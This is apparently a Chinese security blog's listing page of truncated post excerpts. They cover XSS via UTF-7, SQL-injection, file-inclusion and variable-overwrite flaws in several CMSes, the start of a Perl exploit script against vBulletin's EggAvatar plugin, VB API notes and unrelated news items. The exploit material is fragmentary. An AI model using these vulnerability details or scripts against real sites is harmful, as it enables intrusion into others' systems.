【XSS】CSS expressions with UTF-7，UTF-7 编码 XSS 漏洞：https://lcx.cc/post/1198/ utf-7 编码跨站漏洞，是09年某黑客大会提

utf-7 编码跨站工具，utf-7 编码 解码工具下载：https://lcx.cc/post/1199/ utf-7 编码跨站漏洞，是09年某黑客大会提出来的（X

这是一个老漏洞了，临时有用，拿来收集下，说不定以后有用…… 转载于：http://www.llsilver.com/invasion/hole

    本周四，Pwn2own2011黑客大赛如期举行，爱尔兰安全专家斯蒂芬·福尔凭借巧妙的攻击技术利用三个漏洞成功攻破了Windows 7 SP1（

发布日期：2011-03.16 发布作者：cnryan 影响版本：SiteStar V2.0 beta 官方网站：http://www.sitestar.cn/ 漏

    boblog 博客程序任意变量覆盖漏洞(二)     by Ryat[puretot]     mail: puretot at gmail dot com     team: http://www.80vul.com     date: 2011-03-09     先前80vul.com上公布了一个bo-blog的漏洞[1],这个漏洞已

视频，山东单县农民草根明星朱之文，牛人，是金子总会发光的 山东农民歌手 朱之文 《我是大明星》上一曲《临江仙•滚滚长江东逝水》唱响了他

//------------------------------------ Author:tojen (tojen.me at gmail.com) Date: 2010/3/8 By: tojen //-------------------------------------- 描述：     无意间黑盒发现dircms存在宽字节带来的注入问题，虽然流行过一段时间，貌似现在人们都不太关注这个问题。测试了下

EggAvatar for vBulletin 3.8.x SQL Injection Vulnerability： #!/usr/bin/env perl use LWP::UserAgent; sub banner{ print "###################################\n"; print "############ DSecurity ############\n"; print "###################################\n"; print "# Email:dsecurity.vn[at]gmail.com #\n"; print "###################################\n"; } if(@ARGV<5){  print "Usage: $0 address username password number_user sleeptime\n";  print "Example: $0 http://localhost/vbb test test 10 10\n";  exit(); } $ua=LWP::UserAgent->new(); $ua->agent("DSecurity"); $ua->cookie_jar({}); sub login(@){  my $username=shift;  my $password=shift;  my

//------------------------------------- Name: EspCms Site: http://www.ecisp.cn/html/cn/ Desc: 在urldecode() 的作用下的，无过滤导致注入形成 Author: tojen（tojen.me at gmail.com） Date：2011/3

Asp 使用 w3 JMail 组件发送邮件代码： <% Function SendMail(MAddress, MTitle, MContent) '使用格式：收件地址，邮件标题，邮件内容 Dim MUsername, MPassword, MaiServer MUsername = "hello@163.com"     '发件账号 MPassword = "0123456789"        '账号密码 MaiServer = "smtp.163.com"      '发件服务器 Set Jmail

    PS：翻了一下安全焦点的老文章，觉得有用就转载过来了，原文地址：https://www.xfocus.net/bbs/index.php?

简介：     红色代码 (Code Red，2001年)     “红色代码”病毒是2001年一种新型网络病毒，其传播所使用的技术可以充分体现网络时代网络安全与病毒的

    当时在看：         Microsoft 安全公告 MS09-044 - 严重：http://www.microsoft.com/china/technet/security/bulle

VB PopupMenu 用来显示弹出菜单 语法格式：     object.PopupMenu menuname, flags, x, y, boldcommand 参数详解：     Object       对象，窗体名。     Menuname     菜单名，指在菜单编辑器中定义的主菜单项名。     Flags        该参数是一个数值或

    作者：心灵     经典漏洞，来自经典对白看代码…… member.php： if($action=='edit_member_ok'){  //member.php?action=edit_member_ok check_request();  //检查来路         if(!check_login()){  //检测是否登录会员                 message(array('text'=>$language['please_login'],'link'=>'member.php'));         } ...省略一堆无关东西

本人再三思考下，本着自由、分享、进步的精神，还是打算公开源码，再说还有那么多人想要这套程序。 该套程序从2010年04月中旬零碎更新至今，测试

    作者：心灵     SiteTeam 企业自助建站源码版 v4.6.3 0day，从一个0DAY看出社会的黑暗！不是每个表面光鲜的白领人士，做事都是光明的。     不是每个表面光鲜的

    作者：心灵     某个明星官方用这个系统，今天有个网友问我这个程序是否能日下，为了这个明星，决定帮忙看了下。     下载地址：http://www.c

    齐博CMS整站系统 V7.0 无技术含量 0day，首先环境得是 IIS 6.0 的。     漏洞测试：http://www.baidu.com/ewebeditor/c

求生之路2 异度空间 仿CS跳跃服 求生敢死队作品     求生敢死队作品：求生之路2 官方地图修改版 游戏录像，求生敢死队是由游戏求生之路爱好者

求生之路2 遗失的世界 求生敢死队作品     求生敢死队作品：求生之路2 官方地图修改版 游戏录像，求生敢死队是由游戏求生之路爱好者组建的团队

    VB，IsBadReadPtr，IsBadWritePtr，检查内存函数功能详解，IsBadReadPtr 是用来判断指定的内存范围是否可以

    Discuz X1.5 论坛本地文件包含漏洞，当然是有条件的，就是使用文件作为缓存。     作者：Jannock 以下是引用片段： config_global.php $_config['cache']

parse_str 的变量初始化问题，boblog 任意变量覆盖元凶 author: 80vul-B team: http://www.80vul.com date: 2011-02-23 一 描叙     看下手册中对这个函数的部分描述: void parse_str ( string $str [, array &$arr ] ) Parses str as if it were the query string passed

    发现时间：2008-10-02     公开时间：2011-02-27     漏洞影响版本：2.1.0、2.1.1     状态：已修补     漏洞代码如下： 以下是引

    VB CopyMemory() 函数功能详解 函数声明：     Private Declare Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (Destination As Any, Source As Any, ByVal Length As Long)     Private Declare Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (ByVal Destination As Any, ByVal Source As Any, ByVal Length As Long) 功能描述：     将一块内存的数据从一

历史上最胆大的银行劫匪 - 一把斧子(应该是铁锤)4分钟198下敲开防弹玻璃 2·7银行抢劫案，2011年2月7日发生在天津宝坻某邮政储蓄银行，历

StrConv 字符串类型函数功能详解 -------------------------------------------------------------------------------- 函数功能：     返回按指定类型转换的 Variant (String)。 函数语法：     StrConv(string, conversion, LCID) StrConv 函数的语法有下面的命名参数：     部分&nbs

    EnumWindows 枚举所有窗口函数功能详解 函数功能：     该函数枚举所有屏幕上的顶层窗口，并将窗口句柄传送给应用程序定义的回调函数。回调函数返回FALSE将停